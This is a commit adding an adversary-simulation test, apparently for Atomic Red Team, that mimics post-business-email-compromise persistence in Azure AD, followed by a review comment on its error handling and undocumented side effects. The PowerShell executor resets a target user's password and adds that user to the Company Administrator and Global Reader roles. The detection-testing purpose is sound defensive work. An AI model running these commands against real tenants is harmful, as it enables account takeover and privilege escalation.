Adding Simulate - Post BEC persistence via user password reset followed by user added to company administrator role

This commit is contained in:
blueteam0ps
2023-08-26 05:44:16 -07:00
parent 51f01c9695
commit 48702a9d62
+76
@@ -39,3 +39,79 @@ atomic_tests:
Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
name: powershell
elevation_required: false
- name: Simulate - Post BEC persistence via user password reset followed by user added to company administrator role
auto_generated_guid: 14f3af20-61f1-45b8-ad31-4637815f3f44
description: |
This test looks at simulating the an adversary described in the following blog post. It involves resetting the password of a normal user and adding to the company administrator role within M365.
Reference: https://www.huntress.com/blog/business-email-compromise-via-azure-administrative-privileges
supported_platforms:
- azure-ad
input_arguments:
auth_username:
description: Azure AD username used to conduct the adversary activity
type: string
default: jonh@contoso.com
auth_password:
description: Azure AD password for user auth_username
type: string
default: p4sswd
target_user:
description: Name of the user whose password be reset and added to the admin role.
type: string
default: default
target_password:
description: The password that the user target_user will be reset to.
type: string
default: Ohn05GeMe#$
dependency_executor_name: powershell
dependencies:
- description: |
MSOnline and AzureAD modules must be installed.
prereq_command: |
$required_mods = 'AzureAD', 'MSOnline'
$installed_mods = @((Get-Module $required_mods -ListAvailable -ErrorAction SilentlyContinue).Name | Select-Object -Unique)
$notInstalled = Compare-Object $required_mods $installed_mods -PassThru -ErrorAction SilentlyContinue
if ($notInstalled) {
# Prompt for installing the missing ones.
Write-Output "The following PS modules aren't currently installed:"
$notInstalled
exit 1
}
else{
Write-Output "All required PS modules are installed"
exit 0
}
get_prereq_command: |
Install-Module -Name MSOnline -Scope CurrentUser -Force
Install-Module -Name AzureAD -Scope CurrentUser -Force
executor:
command: |
Import-Module MSOnline
Import-Module AzureAD
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
$targetsecurepw = ConvertTo-SecureString -String "#{target_password}" -AsPlainText -Force
Connect-MsolService -Credential $credential -ErrorAction:SilentlyContinue
Connect-AzureAD -Credential $credential -ErrorAction:SilentlyContinue
#Saving the ObjectId of the target_user into a variable
$target_objid = Get-AzureADUser -filter "userPrincipalName eq '#{target_user}'" | Select-Object -ExpandProperty ObjectId
#Reset the password of the target_user
Set-AzureADUserPassword -ObjectId $target_objid -Password $targetsecurepw -ErrorAction:SilentlyContinue
#Adding target_user
Add-MsolRoleMember -RoleName "Company Administrator" -RoleMemberEmailAddress "#{target_user}"
Add-MsolRoleMember -RoleName "Global Reader" -RoleMemberEmailAddress "#{target_user}"
cleanup_command: |
Import-Module MSOnline
$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
Connect-MsolService -Credential $credential
Remove-MsolRoleMember -RoleName "Company Administrator" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
Remove-MsolRoleMember -RoleName "Global Reader" -RoleMemberType User -RoleMemberEmailAddress "#{target_user}"
name: powershell
elevation_required: false
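Review bot: In the new executor, both `Connect-MsolService` and `Connect-AzureAD` are run with `-ErrorAction:SilentlyContinue`, and the `Set-AzureADUserPassword` call is silenced the same way, so a failed sign-in or an unknown `#{target_user}` leaves `$target_objid` empty and the test still reports success without having done anything. Dropping `-ErrorAction:SilentlyContinue` from the two Connect lines and guarding the lookup with `if (-not $target_objid) { throw "target_user '#{target_user}' not found" }` before the password reset makes the failure visible to the runner. The executor also adds the "Global Reader" role, which the test name and description do not mention, and `cleanup_command` removes the two role memberships but does not revert the password reset; a sentence in `description` such as "Note: the reset password is not restored by cleanup and the user is also added to the Global Reader role" would document both. The `-filter "userPrincipalName eq '#{target_user}'"` string is built by plain substitution, so a `target_user` value containing an apostrophe would break the OData filter rather than fail cleanly, which is worth a comment if the argument is expected to be user-supplied.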